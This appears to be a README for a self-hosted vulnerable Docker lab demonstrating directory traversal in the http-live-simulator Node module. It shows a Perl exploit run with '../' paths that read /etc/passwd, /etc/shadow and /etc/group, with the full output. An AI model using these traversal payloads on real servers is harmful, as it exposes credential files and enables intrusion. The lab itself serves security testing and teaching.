
http-Directory-Traversal-simulator: a vulnerable Node 8 web app

  • module : http-live-simulator
  • version : < 1.0.9
  • severity: high

Installation using Docker

https://hub.docker.com/_/node/

  • Welcome to https://hub.docker.com/u/nu11secur1ty

  • NOTE: If you want to test, rename package_json.txt to package.json and package-lock_json.txt to package-lock.json

  • Package For Kali Linux

apt install -y docker-compose
  • Start the docker service on Kali Linux
systemctl start docker.service
  • Build
cd http-Directory-Traversal-simulator
docker-compose up --build

Launch Attack

  • [open the terminal and run the following]

perl cureedjiento.pl
  • Enter the target URL when the script prompts for it, with the file you are looking for in place of your_searching:
http://localhost:8080//../../../../../../etc/your_searching

http://localhost:8080//../../../../../../etc/passwd

  • Output of passwd
root@kali:~/EXPLOITS/CVE-EXPLOIT-DB/CVE-2019-6500/Perl-exploit# perl cureedjiento.pl 
The webpage? example URL:
https://insecure-website.com/loadImage?filename=
or https://domain.some/
or https://domain.some
http://localhost:8080//../../../../../../etc/passwd

 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
 0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0curl: (6) Could not resolve host: curl
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
100   958    0   958    0     0   2157      0 --:--:-- --:--:-- --:--:--  2157
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
node:x:1000:1000::/home/node:/bin/bash

http://localhost:8080//../../../../../../etc/shadow

  • Output of shadow
root@kali:~/EXPLOITS/CVE-EXPLOIT-DB/CVE-2019-6500/Perl-exploit# perl cureedjiento.pl 
The webpage? example URL:
https://insecure-website.com/loadImage?filename=
or https://domain.some/
or https://domain.some
http://localhost:8080//../../../../../../etc/shadow

% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0curl: (6) Could not resolve host: curl
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   527    0   527    0     0   1301      0 --:--:-- --:--:-- --:--:--  1301
root:*:18254:0:99999:7:::
daemon:*:18254:0:99999:7:::
bin:*:18254:0:99999:7:::
sys:*:18254:0:99999:7:::
sync:*:18254:0:99999:7:::
games:*:18254:0:99999:7:::
man:*:18254:0:99999:7:::
lp:*:18254:0:99999:7:::
mail:*:18254:0:99999:7:::
news:*:18254:0:99999:7:::
uucp:*:18254:0:99999:7:::
proxy:*:18254:0:99999:7:::
www-data:*:18254:0:99999:7:::
backup:*:18254:0:99999:7:::
list:*:18254:0:99999:7:::
irc:*:18254:0:99999:7:::
gnats:*:18254:0:99999:7:::
nobody:*:18254:0:99999:7:::
_apt:*:18254:0:99999:7:::
node:!:18258:0:99999:7:::

http://localhost:8080//../../../../../../etc/group

  • Output of group
root@kali:~/EXPLOITS/CVE-EXPLOIT-DB/CVE-2019-6500/Perl-exploit# perl cureedjiento.pl 
The webpage? example URL:
https://insecure-website.com/loadImage?filename=
or https://domain.some/
or https://domain.some
http://localhost:8080//../../../../../../etc/group

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0curl: (6) Could not resolve host: curl
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   470    0   470    0     0   1266      0 --:--:-- --:--:-- --:--:--  1266
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
ssh:x:101:
node:x:1000:

  • Analysis: the GET request path is vulnerable, as the simulator's own log shows
directory-traversal-http-live-simulator | REQUEST:  GET /../../../../../etc/passwd
directory-traversal-http-live-simulator | REQUEST:  GET /../../../../../etc/shadow
directory-traversal-http-live-simulator | REQUEST:  GET /../../../../../etc/group

Uninstall

cd http-simulator
docker-compose rm

IMPORTANT: In this presentation, no one was harmed or lost information! ;)

BR
